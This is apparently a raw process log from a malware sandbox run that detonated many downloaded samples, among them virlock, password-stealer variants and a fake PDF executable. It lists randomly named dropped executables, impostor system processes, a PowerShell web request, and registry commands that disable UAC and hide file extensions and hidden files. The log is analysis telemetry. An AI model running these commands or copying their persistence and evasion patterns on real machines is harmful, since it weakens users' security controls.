C:\Users\Admin\Downloads\240920-t8t7wsxapqee02ef82034bceac64cbed4586b6c2c2_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t8t7wsxapqee02ef82034bceac64cbed4586b6c2c2_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vtmpyaxfmgee11129ff1949b73f9700d0aeacaea47_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vtmpyaxfmgee11129ff1949b73f9700d0aeacaea47_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vbjwbswgpcee04b9b0337916cfc91aa31be15ff4f8_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vbjwbswgpcee04b9b0337916cfc91aa31be15ff4f8_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vwp8vaxgqeee12ff2b7e6ea4788c62fdb82e9a8769_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vwp8vaxgqeee12ff2b7e6ea4788c62fdb82e9a8769_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t98rnsxbmj85e63c3cb226fabb654b1f69697c9e28b33639255893f69078591659011cc7c6N.exe

C:\Users\Admin\Downloads\240920-t98rnsxbmj85e63c3cb226fabb654b1f69697c9e28b33639255893f69078591659011cc7c6N.exe

C:\Users\Admin\vWkgkoAc\xecgcYQQ.exe

"C:\Users\Admin\vWkgkoAc\xecgcYQQ.exe"

C:\Users\Admin\Downloads\240920-t9hkgsxbjm272d1d0b3d09e72ed24986e6ed486022f49693612d3a59004c97f6ac86711e45N.exe

C:\Users\Admin\Downloads\240920-t9hkgsxbjm272d1d0b3d09e72ed24986e6ed486022f49693612d3a59004c97f6ac86711e45N.exe

C:\Users\Admin\Downloads\240920-vxj38axhlcSecuriteInfo.com.Win32.Evo-gen.26545.23661.exe

C:\Users\Admin\Downloads\240920-vxj38axhlcSecuriteInfo.com.Win32.Evo-gen.26545.23661.exe

C:\Users\Admin\Downloads\240920-vne3xaxdkfee0d2bc32b5c6ac1f13a2ef5117c0027_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vne3xaxdkfee0d2bc32b5c6ac1f13a2ef5117c0027_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vl57baxgjm802ef530efd1ff23ad921c1f40b64c07929003a2e91a9f4cb8c40ceb36a708feN.exe

C:\Users\Admin\Downloads\240920-vl57baxgjm802ef530efd1ff23ad921c1f40b64c07929003a2e91a9f4cb8c40ceb36a708feN.exe

C:\Users\Admin\Downloads\240920-vtqrlaybkj666e93e6dd12009f6c4a6cc4dc82301607395474151804178174a2ae44d589bbN.exe

C:\Users\Admin\Downloads\240920-vtqrlaybkj666e93e6dd12009f6c4a6cc4dc82301607395474151804178174a2ae44d589bbN.exe

C:\Users\Admin\Downloads\240920-t5fv4awhll0627d9d2c84faa7c583577aae50e8e85571ba1ad01840e59df2c8a6b6d40d586N.exe

C:\Users\Admin\Downloads\240920-t5fv4awhll0627d9d2c84faa7c583577aae50e8e85571ba1ad01840e59df2c8a6b6d40d586N.exe

C:\Users\Admin\Downloads\240920-vddgbswhmhGLOBAL ORIOLE.pdf.exe

"C:\Users\Admin\Downloads\240920-vddgbswhmhGLOBAL ORIOLE.pdf.exe"

C:\Users\Admin\Downloads\240920-t6882awfjb93d033e68409faf9e1b6ed481e11808b8338f9d46639bec0efc4a133f0e786cfN.exe

C:\Users\Admin\Downloads\240920-t6882awfjb93d033e68409faf9e1b6ed481e11808b8338f9d46639bec0efc4a133f0e786cfN.exe

C:\Users\Admin\Downloads\240920-vgy77sxapdbd95f57e6824a46714d028a23a6f1d5de9023080a475407843e55a7c1cbbf566N.exe

C:\Users\Admin\Downloads\240920-vgy77sxapdbd95f57e6824a46714d028a23a6f1d5de9023080a475407843e55a7c1cbbf566N.exe

C:\Users\Admin\Downloads\240920-t6n8vsweqdee014bb1fe340a4e9e0010666054809a_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t6n8vsweqdee014bb1fe340a4e9e0010666054809a_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t7k8laxajne117e0ef832043df55737771b3a999646d55d230def8435d3a2ee36b48f76e9fN.exe

C:\Users\Admin\Downloads\240920-t7k8laxajne117e0ef832043df55737771b3a999646d55d230def8435d3a2ee36b48f76e9fN.exe

C:\Users\Admin\Downloads\240920-vvklzaxgla3268a7375a61710936c74cb2c9cd475f6961dbb06264b23071cdc4c0515f48cdN.exe

C:\Users\Admin\Downloads\240920-vvklzaxgla3268a7375a61710936c74cb2c9cd475f6961dbb06264b23071cdc4c0515f48cdN.exe

C:\Users\Admin\Downloads\240920-vmhseaxcphee0c7e41c26f3b7f391d06ae0dac37d5_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vmhseaxcphee0c7e41c26f3b7f391d06ae0dac37d5_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vv261sybnq5ce35fbb0032ae0e8491dd920059dded9e9c311cb6953d6caf782140e9ed3e90N.exe

C:\Users\Admin\Downloads\240920-vv261sybnq5ce35fbb0032ae0e8491dd920059dded9e9c311cb6953d6caf782140e9ed3e90N.exe

C:\Users\Admin\Downloads\240920-vda17swhmg75db38b348c1f8dd6346bc2c753e93b4e3fa13b8a35b8d9b24e31c706f5d53f8N.exe

C:\Users\Admin\Downloads\240920-vda17swhmg75db38b348c1f8dd6346bc2c753e93b4e3fa13b8a35b8d9b24e31c706f5d53f8N.exe

C:\Users\Admin\Downloads\240920-vxj38ayckqSecuriteInfo.com.Win32.PWSX-gen.14288.19346.exe

C:\Users\Admin\Downloads\240920-vxj38ayckqSecuriteInfo.com.Win32.PWSX-gen.14288.19346.exe

C:\Users\Admin\Downloads\240920-vya7psxhpbee13e708610de128bccf4ee2195d43bf_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vya7psxhpbee13e708610de128bccf4ee2195d43bf_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t867fsxarjd95a09b83140ba297f21dd123447acba249c139afb8a10a425e3e5b0dd620d41N.exe

C:\Users\Admin\Downloads\240920-t867fsxarjd95a09b83140ba297f21dd123447acba249c139afb8a10a425e3e5b0dd620d41N.exe

C:\Users\Admin\Downloads\240920-t9cz1axarpee035b3e554e06310ec0f0866dd21918_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t9cz1axarpee035b3e554e06310ec0f0866dd21918_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vdez6awhnb379cf98ccca18e31713c235a6231a2c6683f620b741e4896336fbe237fb85fe7N.exe

C:\Users\Admin\Downloads\240920-vdez6awhnb379cf98ccca18e31713c235a6231a2c6683f620b741e4896336fbe237fb85fe7N.exe

C:\Users\Admin\Downloads\240920-t944gsxblqee03edaa479f6a77a7bd3d37c77bccea_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t944gsxblqee03edaa479f6a77a7bd3d37c77bccea_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t7cw8awfjf79ce98c747f0efd4d3316b3ffb7b9e12c582517f9b99e3cdae7dd129979b8495N.exe

C:\Users\Admin\Downloads\240920-t7cw8awfjf79ce98c747f0efd4d3316b3ffb7b9e12c582517f9b99e3cdae7dd129979b8495N.exe

C:\Users\Admin\Downloads\240920-t9w3waxbkr715203873811b95d4310fd89cb6e29865c3a111cf28b1267f9fde31f7ea7401aN.exe

C:\Users\Admin\Downloads\240920-t9w3waxbkr715203873811b95d4310fd89cb6e29865c3a111cf28b1267f9fde31f7ea7401aN.exe

C:\Users\Admin\Downloads\240920-vlhe9axckff87824c8d13618b98793c9757dc907a608b617c12caca90a880e90ca6485b463.exe

C:\Users\Admin\Downloads\240920-vlhe9axckff87824c8d13618b98793c9757dc907a608b617c12caca90a880e90ca6485b463.exe

C:\Users\Admin\Downloads\240920-vqdb4axdrg96f080f4bbba22daf61306b7b0660ff092dc65b837702a6218d48b33961ea9c1N.exe

C:\Users\Admin\Downloads\240920-vqdb4axdrg96f080f4bbba22daf61306b7b0660ff092dc65b837702a6218d48b33961ea9c1N.exe

C:\Users\Admin\Downloads\240920-vdj9wawhnf6301dcad3f8028453555ee2095b41fdfd81d09acf18a1989eea3ee1219ff7c00N.exe

C:\Users\Admin\Downloads\240920-vdj9wawhnf6301dcad3f8028453555ee2095b41fdfd81d09acf18a1989eea3ee1219ff7c00N.exe

C:\Users\Admin\Downloads\240920-vxvvqaycmpee13a42c4f20ea45d7fee9738a339abd_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vxvvqaycmpee13a42c4f20ea45d7fee9738a339abd_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vzpfqayakhee14cb1f5b8ec791c3e9786fdbf9c461_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vzpfqayakhee14cb1f5b8ec791c3e9786fdbf9c461_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vf35rsxdql9acde2fe50b405682b18d79f298f3be86b48c7d178e29fc9fd227f3e2e6393edN.exe

C:\Users\Admin\Downloads\240920-vf35rsxdql9acde2fe50b405682b18d79f298f3be86b48c7d178e29fc9fd227f3e2e6393edN.exe

C:\Users\Admin\Downloads\240920-vfg8asxdmnee0796c12b300a9e1912b92d2f41e974_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vfg8asxdmnee0796c12b300a9e1912b92d2f41e974_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vv9k4aybplee12a7c972dcaf4c122a5342ffb4bab8_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vv9k4aybplee12a7c972dcaf4c122a5342ffb4bab8_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t46ecswekc0eab37817640bbd855b5e1fe0ffcf5d596bfec59903821c1131ce87a554dee29N.exe

C:\Users\Admin\Downloads\240920-t46ecswekc0eab37817640bbd855b5e1fe0ffcf5d596bfec59903821c1131ce87a554dee29N.exe

C:\Users\Admin\Downloads\240920-t5k5tawelf97e424d5f69693fea1d0ff4285927d803695c35cc1b6ea2d76ff1d2a4cc7999aN.exe

C:\Users\Admin\Downloads\240920-t5k5tawelf97e424d5f69693fea1d0ff4285927d803695c35cc1b6ea2d76ff1d2a4cc7999aN.exe

C:\Users\Admin\Downloads\240920-vgnfpsxejme8ae554d659da355e96bceeb44e37eaa2e82eceead2d50def3d315cb155ebb2aN.exe

C:\Users\Admin\Downloads\240920-vgnfpsxejme8ae554d659da355e96bceeb44e37eaa2e82eceead2d50def3d315cb155ebb2aN.exe

C:\Users\Admin\Downloads\240920-vcmnlswhjfee05b3c055ffd95c9140c6edd9056e4a_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vcmnlswhjfee05b3c055ffd95c9140c6edd9056e4a_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vdx6qsxcqkf04fb022170ec80b0689862c05fceb1edf5d9c0c619e69a98fcd73a0263dc625N.exe

C:\Users\Admin\Downloads\240920-vdx6qsxcqkf04fb022170ec80b0689862c05fceb1edf5d9c0c619e69a98fcd73a0263dc625N.exe

C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vyp1vsycrjee14283f7c5a5ebfc08d80054db2cdf5_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vyp1vsycrjee14283f7c5a5ebfc08d80054db2cdf5_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vm1cfsxcrf7be1403d7fc2ffa2d447292f188903ccf35089c9945feca0fd59f85bdedcb8adN.exe

C:\Users\Admin\Downloads\240920-vm1cfsxcrf7be1403d7fc2ffa2d447292f188903ccf35089c9945feca0fd59f85bdedcb8adN.exe

C:\Users\Admin\Downloads\240920-vvmrbsybml0a7ce06110e4f9408edc19d1c94f1217487ce8bfe135ec304938ee12353ad3d0N.exe

C:\Users\Admin\Downloads\240920-vvmrbsybml0a7ce06110e4f9408edc19d1c94f1217487ce8bfe135ec304938ee12353ad3d0N.exe

C:\Users\Admin\Downloads\240920-vq9ejaxemeee0f1a3d336fe2b1a51f38d3e16d2aed_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vq9ejaxemeee0f1a3d336fe2b1a51f38d3e16d2aed_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vdmd8swhnhcb83762b5ac0fb6f195b56a23440cb42c1b620ce4ceab896fbb29f62b30ccd90N.exe

C:\Users\Admin\Downloads\240920-vdmd8swhnhcb83762b5ac0fb6f195b56a23440cb42c1b620ce4ceab896fbb29f62b30ccd90N.exe

C:\Users\Admin\Downloads\240920-vwk9wsxgpeee12d659649c4bd7c35a6d69f8ad5cd1_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vwk9wsxgpeee12d659649c4bd7c35a6d69f8ad5cd1_JaffaCakes118.exe

\??\c:\windows\system\spoolsv.exe

c:\windows\system\spoolsv.exe SE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\SysWOW64\Dikpbl32.exe

C:\Windows\system32\Dikpbl32.exe

\??\c:\dvpvj.exe

c:\dvpvj.exe

C:\ProgramData\QSIQUwwA\quUUkIYA.exe

"C:\ProgramData\QSIQUwwA\quUUkIYA.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock"

C:\Windows\SysWOW64\Ehailbaa.exe

C:\Windows\system32\Ehailbaa.exe

C:\Windows\SysWOW64\Ehailbaa.exe

C:\Windows\system32\Ehailbaa.exe

\??\c:\dpdpp.exe

c:\dpdpp.exe

C:\Windows\SysWOW64\Ejpfhnpe.exe

C:\Windows\system32\Ejpfhnpe.exe

C:\Windows\SysWOW64\Efdjgo32.exe

C:\Windows\system32\Efdjgo32.exe

C:\Windows\services.exe

"C:\Windows\services.exe"

C:\Windows\SysWOW64\Eaindh32.exe

C:\Windows\system32\Eaindh32.exe

\??\c:\thbthb.exe

c:\thbthb.exe

C:\Windows\SysWOW64\Ehcfaboo.exe

C:\Windows\system32\Ehcfaboo.exe

\??\c:\806422.exe

c:\806422.exe

C:\Windows\SysWOW64\Ehfcfb32.exe

C:\Windows\system32\Ehfcfb32.exe

C:\Windows\SysWOW64\Eiildjag.exe

C:\Windows\system32\Eiildjag.exe

C:\Users\Admin\Downloads\240920-t5ye5swenada060516a85dbec966bb82033cd7090a1b09ae7885a7666162eb8f61ce8af3c7ze.exe

C:\Users\Admin\Downloads\240920-t5ye5swenada060516a85dbec966bb82033cd7090a1b09ae7885a7666162eb8f61ce8af3c7ze.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\Fkkeclfh.exe

C:\Windows\system32\Fkkeclfh.exe

C:\Windows\SysWOW64\Fkkeclfh.exe

C:\Windows\system32\Fkkeclfh.exe

C:\Windows\System\TdhbbIx.exe

C:\Windows\System\TdhbbIx.exe

C:\Windows\System\EgQJfQY.exe

C:\Windows\System\EgQJfQY.exe

C:\Windows\SysWOW64\Fhdohp32.exe

C:\Windows\system32\Fhdohp32.exe

C:\Windows\System\GfUhsOo.exe

C:\Windows\System\GfUhsOo.exe

C:\Windows\System\RvTNTEU.exe

C:\Windows\System\RvTNTEU.exe

\??\c:\646084.exe

c:\646084.exe

C:\Windows\System\JXqfaGR.exe

C:\Windows\System\JXqfaGR.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yKYoYwIs.bat" "C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe""

C:\Windows\SysWOW64\Fpodlbng.exe

C:\Windows\system32\Fpodlbng.exe

C:\Windows\System\rowOyZY.exe

C:\Windows\System\rowOyZY.exe

C:\Users\Admin\Downloads\240920-vhf31sxenjee092459cbb57c205b746f7b6a66a535_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vhf31sxenjee092459cbb57c205b746f7b6a66a535_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vsn7dayanpf1a1efed0f975441f781f904480392d301ab554bcbfda100ac2d49b9bf2d2467N.exe

C:\Users\Admin\Downloads\240920-vsn7dayanpf1a1efed0f975441f781f904480392d301ab554bcbfda100ac2d49b9bf2d2467N.exe

C:\Users\Admin\Downloads\240920-t8t7wsxapqee02ef82034bceac64cbed4586b6c2c2_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-t8t7wsxapqee02ef82034bceac64cbed4586b6c2c2_JaffaCakes118.exe

\??\c:\42822.exe

c:\42822.exe

\??\c:\00086.exe

c:\00086.exe

C:\Windows\SysWOW64\Gigheh32.exe

C:\Windows\system32\Gigheh32.exe

C:\Windows\System\PChLkBI.exe

C:\Windows\System\PChLkBI.exe

\??\c:\windows\system\svchost.exe

c:\windows\system\svchost.exe

C:\Windows\System\QYkatNS.exe

C:\Windows\System\QYkatNS.exe

C:\Windows\System\ddrQHUY.exe

C:\Windows\System\ddrQHUY.exe

C:\Windows\System\tODvHtV.exe

C:\Windows\System\tODvHtV.exe

C:\Windows\SysWOW64\Gigheh32.exe

C:\Windows\system32\Gigheh32.exe

C:\Windows\SysWOW64\Gmeakf32.exe

C:\Windows\system32\Gmeakf32.exe

C:\Windows\System\TmZrXPT.exe

C:\Windows\System\TmZrXPT.exe

C:\Windows\SysWOW64\Gigheh32.exe

C:\Windows\system32\Gigheh32.exe

C:\Windows\System\KHEpudW.exe

C:\Windows\System\KHEpudW.exe

C:\Windows\System\fJXGNqg.exe

C:\Windows\System\fJXGNqg.exe

C:\Windows\System\ZWlNivV.exe

C:\Windows\System\ZWlNivV.exe

C:\Windows\SysWOW64\Ggbook32.exe

C:\Windows\system32\Ggbook32.exe

C:\Windows\System\eclFDge.exe

C:\Windows\System\eclFDge.exe

C:\Windows\SysWOW64\Gkgeoklj.exe

C:\Windows\system32\Gkgeoklj.exe

\??\c:\6682266.exe

c:\6682266.exe

\??\c:\xxrffxr.exe

c:\xxrffxr.exe

C:\Windows\SysWOW64\Gijekg32.exe

C:\Windows\system32\Gijekg32.exe

C:\Windows\SysWOW64\Gijekg32.exe

C:\Windows\system32\Gijekg32.exe

C:\Windows\SysWOW64\Gijekg32.exe

C:\Windows\system32\Gijekg32.exe

C:\Windows\SysWOW64\Gkgeoklj.exe

C:\Windows\system32\Gkgeoklj.exe

C:\Windows\System\NsFdnav.exe

C:\Windows\System\NsFdnav.exe

C:\Users\Admin\Downloads\240920-vx29ssxhnbee13bc1e7a6228c6d7e8c2ead9af4eb6_JaffaCakes118.exe

C:\Users\Admin\Downloads\240920-vx29ssxhnbee13bc1e7a6228c6d7e8c2ead9af4eb6_JaffaCakes118.exe

C:\Windows\SysWOW64\Ikejgf32.exe

C:\Windows\system32\Ikejgf32.exe

C:\Windows\System\MkEjoku.exe

C:\Windows\System\MkEjoku.exe

\??\c:\86822.exe

c:\86822.exe

\??\c:\lrrrlxx.exe

c:\lrrrlxx.exe

\??\c:\62404.exe

c:\62404.exe

C:\Windows\System\AEqQCQL.exe

C:\Windows\System\AEqQCQL.exe

C:\Windows\SysWOW64\Indfca32.exe

C:\Windows\system32\Indfca32.exe

C:\Windows\System\zsbJKcg.exe

C:\Windows\System\zsbJKcg.exe

C:\Windows\System\pjwpqeE.exe

C:\Windows\System\pjwpqeE.exe

C:\Windows\SysWOW64\Jnhpoamf.exe

C:\Windows\system32\Jnhpoamf.exe

C:\Windows\System\MdZLudF.exe

C:\Windows\System\MdZLudF.exe

C:\Windows\System\QSJXJIA.exe

C:\Windows\System\QSJXJIA.exe

C:\Windows\System\jMgUiLs.exe

C:\Windows\System\jMgUiLs.exe

C:\Windows\System\WIALYWP.exe

C:\Windows\System\WIALYWP.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 356

C:\Windows\SysWOW64\Jhijqj32.exe

C:\Windows\system32\Jhijqj32.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 220

C:\Windows\System\UGYtdHy.exe

C:\Windows\System\UGYtdHy.exe

C:\Windows\System\FRepuWN.exe

C:\Windows\System\FRepuWN.exe

C:\Windows\System\eBEKeel.exe

C:\Windows\System\eBEKeel.exe

\??\c:\222644.exe

c:\222644.exe

\??\c:\08066.exe

c:\08066.exe

C:\Windows\SysWOW64\Kkfcndce.exe

C:\Windows\system32\Kkfcndce.exe

C:\Windows\System\YKpnzUX.exe

C:\Windows\System\YKpnzUX.exe

C:\Windows\SysWOW64\Kgjgne32.exe

C:\Windows\system32\Kgjgne32.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 720

C:\Windows\SysWOW64\Kbbhqn32.exe

C:\Windows\system32\Kbbhqn32.exe

C:\Windows\System\TFMhLeo.exe

C:\Windows\System\TFMhLeo.exe

C:\Windows\System\QfdRlhp.exe

C:\Windows\System\QfdRlhp.exe

C:\Windows\SysWOW64\Kjmmepfj.exe

C:\Windows\system32\Kjmmepfj.exe

\??\c:\hhbbhb.exe

c:\hhbbhb.exe

C:\Windows\SysWOW64\Kniieo32.exe

C:\Windows\system32\Kniieo32.exe

C:\Windows\System\mcSxvdX.exe

C:\Windows\System\mcSxvdX.exe

C:\Windows\System\ugiVuaW.exe

C:\Windows\System\ugiVuaW.exe

C:\Windows\System\Nbxwhwo.exe

C:\Windows\System\Nbxwhwo.exe

C:\Windows\System\nHZgOsq.exe

C:\Windows\System\nHZgOsq.exe

\??\c:\windows\system\spoolsv.exe

c:\windows\system\spoolsv.exe PR

\??\c:\m8420.exe

c:\m8420.exe

C:\Windows\SysWOW64\Knkekn32.exe

C:\Windows\system32\Knkekn32.exe

C:\Windows\SysWOW64\Knkekn32.exe

C:\Windows\system32\Knkekn32.exe

C:\Windows\SysWOW64\Lbgalmej.exe

C:\Windows\system32\Lbgalmej.exe

C:\Windows\System\OEDSgNr.exe

C:\Windows\System\OEDSgNr.exe

C:\Windows\System\Qzzejlh.exe

C:\Windows\System\Qzzejlh.exe

C:\Windows\System\NqxwXgp.exe

C:\Windows\System\NqxwXgp.exe

C:\Windows\System\IMikeJe.exe

C:\Windows\System\IMikeJe.exe

C:\Windows\System\cocXwPy.exe

C:\Windows\System\cocXwPy.exe

C:\Windows\System\rNCTaTP.exe

C:\Windows\System\rNCTaTP.exe

C:\Windows\System\tKousju.exe

C:\Windows\System\tKousju.exe

C:\Windows\System\aEvVwji.exe

C:\Windows\System\aEvVwji.exe

C:\Windows\System\PLGNXoc.exe

C:\Windows\System\PLGNXoc.exe

C:\Windows\System\wOoBXxW.exe

C:\Windows\System\wOoBXxW.exe

C:\Windows\System\jJMaGwv.exe

C:\Windows\System\jJMaGwv.exe

\??\c:\hhbtnh.exe

c:\hhbtnh.exe

C:\Windows\SysWOW64\Kgamnded.exe

C:\Windows\system32\Kgamnded.exe

C:\Windows\System\dCAVWHr.exe

C:\Windows\System\dCAVWHr.exe

\??\c:\82624.exe

c:\82624.exe

C:\Windows\SysWOW64\Mbenmk32.exe

C:\Windows\system32\Mbenmk32.exe

C:\Windows\System\SVqGvdg.exe

C:\Windows\System\SVqGvdg.exe

C:\Windows\SysWOW64\Mahnhhod.exe

C:\Windows\system32\Mahnhhod.exe

\??\c:\htbnnh.exe

c:\htbnnh.exe

C:\Windows\System\qIbrRKE.exe

C:\Windows\System\qIbrRKE.exe

\??\c:\9vpjd.exe

c:\9vpjd.exe

C:\Windows\SysWOW64\Mhafeb32.exe

C:\Windows\system32\Mhafeb32.exe

C:\Windows\SysWOW64\Mecjif32.exe

C:\Windows\system32\Mecjif32.exe

C:\Windows\SysWOW64\Mecjif32.exe

C:\Windows\system32\Mecjif32.exe

C:\Windows\System\tPnPrHz.exe

C:\Windows\System\tPnPrHz.exe

C:\Users\Admin\Downloads\240920-t6xv1awerda1d9685b779b86019b88647b74824326509e5acdeeba09cfa31aead07beb55c7N.exe

C:\Users\Admin\Downloads\240920-t6xv1awerda1d9685b779b86019b88647b74824326509e5acdeeba09cfa31aead07beb55c7N.exe

C:\Windows\SysWOW64\Nlfelogp.exe

C:\Windows\system32\Nlfelogp.exe

\??\c:\rfflfxl.exe

c:\rfflfxl.exe

\??\c:\rrlfxrf.exe

c:\rrlfxrf.exe

C:\Windows\System\UpmyDUg.exe

C:\Windows\System\UpmyDUg.exe

C:\Windows\SysWOW64\Neoieenp.exe

C:\Windows\system32\Neoieenp.exe

\??\c:\0406488.exe

c:\0406488.exe

\??\c:\2226482.exe

c:\2226482.exe

C:\Windows\System\wimPWUW.exe

C:\Windows\System\wimPWUW.exe

C:\Windows\SysWOW64\Nbqmiinl.exe

C:\Windows\system32\Nbqmiinl.exe

C:\Windows\System\rmfTEKF.exe

C:\Windows\System\rmfTEKF.exe

C:\Windows\SysWOW64\Nbqmiinl.exe

C:\Windows\system32\Nbqmiinl.exe

C:\Windows\SysWOW64\Noeahkfc.exe

C:\Windows\system32\Noeahkfc.exe

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System\CywGbvp.exe

C:\Windows\System\CywGbvp.exe

C:\Windows\System\IwgJpDV.exe

C:\Windows\System\IwgJpDV.exe

C:\Windows\System\MtpJEtb.exe

C:\Windows\System\MtpJEtb.exe

C:\Windows\System\WvVrYoz.exe

C:\Windows\System\WvVrYoz.exe

C:\Windows\SysWOW64\Aeddnp32.exe

C:\Windows\system32\Aeddnp32.exe

C:\Windows\System\DwUVGRv.exe

C:\Windows\System\DwUVGRv.exe

C:\Windows\System\fRNlGzK.exe

C:\Windows\System\fRNlGzK.exe

C:\Windows\System\LHNqpZm.exe

C:\Windows\System\LHNqpZm.exe

C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe

"C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe"

C:\Windows\System\lRQtBJe.exe

C:\Windows\System\lRQtBJe.exe

C:\Windows\System\YcdjrUr.exe

C:\Windows\System\YcdjrUr.exe

C:\Windows\System\NAqJYII.exe

C:\Windows\System\NAqJYII.exe

\??\c:\20604.exe

c:\20604.exe

C:\Windows\SysWOW64\Acfhad32.exe

C:\Windows\system32\Acfhad32.exe

C:\Windows\SysWOW64\Bfpdin32.exe

C:\Windows\system32\Bfpdin32.exe

C:\Windows\System\kjeBDZw.exe

C:\Windows\System\kjeBDZw.exe

C:\Windows\System\gPgKcPY.exe

C:\Windows\System\gPgKcPY.exe

C:\Windows\System\FZPhtiu.exe

C:\Windows\System\FZPhtiu.exe

C:\Windows\System\YoBeWxX.exe

C:\Windows\System\YoBeWxX.exe

C:\Windows\System\PhZLHtk.exe

C:\Windows\System\PhZLHtk.exe

C:\Windows\System\sroEdFR.exe

C:\Windows\System\sroEdFR.exe

C:\Windows\System\BWxfmuv.exe

C:\Windows\System\BWxfmuv.exe

C:\Windows\SysWOW64\Bbdhiojo.exe

C:\Windows\system32\Bbdhiojo.exe

C:\Windows\SysWOW64\Bcddcbab.exe

C:\Windows\system32\Bcddcbab.exe

C:\Windows\System\bQhvDcG.exe

C:\Windows\System\bQhvDcG.exe

C:\Windows\SysWOW64\Bhamkipi.exe

C:\Windows\system32\Bhamkipi.exe

C:\Users\Admin\AppData\Local\Temp\01.exe

C:\Users\Admin\AppData\Local\Temp\01.exe

\??\c:\0404404.exe

c:\0404404.exe

C:\Windows\System\kypowzl.exe

C:\Windows\System\kypowzl.exe

C:\Windows\SysWOW64\LaunchWinApp.exe

C:\Windows\system32\LaunchWinApp.exe

C:\Windows\System\COpVgUC.exe

C:\Windows\System\COpVgUC.exe

C:\Windows\System\olAiDjY.exe

C:\Windows\System\olAiDjY.exe

\??\c:\266008.exe

c:\266008.exe

\??\c:\pa060.exe

c:\pa060.exe

C:\Windows\System\PbrjTAv.exe

C:\Windows\System\PbrjTAv.exe

C:\Windows\System\MhKFkdc.exe

C:\Windows\System\MhKFkdc.exe

C:\Windows\System\LvRZEDU.exe

C:\Windows\System\LvRZEDU.exe

C:\Windows\System\CUtMKvV.exe

C:\Windows\System\CUtMKvV.exe

C:\Windows\System\zeLiprV.exe

C:\Windows\System\zeLiprV.exe

C:\Windows\System\holVXqn.exe

C:\Windows\System\holVXqn.exe

C:\Windows\System\RsxGOxC.exe

C:\Windows\System\RsxGOxC.exe

\??\c:\xfxxlxl.exe

c:\xfxxlxl.exe

C:\Windows\SysWOW64\Cjnffjkl.exe

C:\Windows\system32\Cjnffjkl.exe

C:\Windows\System\plamFCu.exe

C:\Windows\System\plamFCu.exe

\??\c:\08204.exe

c:\08204.exe

C:\Windows\System\Loyxlbr.exe

C:\Windows\System\Loyxlbr.exe

C:\Windows\System\YQaaHcO.exe

C:\Windows\System\YQaaHcO.exe

C:\Windows\System\JjXpVkv.exe

C:\Windows\System\JjXpVkv.exe

